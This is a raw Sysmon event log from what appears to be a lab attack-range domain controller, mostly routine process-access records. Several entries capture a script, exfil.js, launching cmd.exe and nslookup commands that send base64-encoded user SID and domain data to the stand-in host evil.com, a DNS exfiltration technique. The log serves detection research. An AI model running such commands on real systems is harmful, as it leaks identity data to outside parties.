14:21:36.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.782{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6444-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.782{2E1864BB-18F0-629A-6244-000000005F02}75885060C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-6444-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.783{2E1864BB-18F0-629A-6444-000000005F02}2824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-6244-000000005F02}7588C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwgok.tmp 2>&1 10341000x8000000000000000210784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.744{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6344-000000005F02}6224C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.744{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6344-000000005F02}6224C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.744{2E1864BB-18F0-629A-6344-000000005F02}62247396C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6244-000000005F02}7588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6344-000000005F02}6224C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6244-000000005F02}7588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-18E0-629A-6742-000000005F02}39764176C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-6244-000000005F02}7588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.736{2E1864BB-18F0-629A-6244-000000005F02}7588C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwgok.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.728{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpugr.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-18F0-629A-6044-000000005F02}59325332C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6144-000000005F02}7480C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6144-000000005F02}7480C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.697{2E1864BB-18F0-629A-5F44-000000005F02}56962536C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-6144-000000005F02}7480C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.701{2E1864BB-18F0-629A-6144-000000005F02}7480C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-5F44-000000005F02}5696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpugr.tmp 2>&1 10341000x8000000000000000210764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.681{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6044-000000005F02}5932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.680{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6044-000000005F02}5932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.676{2E1864BB-18F0-629A-6044-000000005F02}59325332C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5F44-000000005F02}5696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.660{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6044-000000005F02}5932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 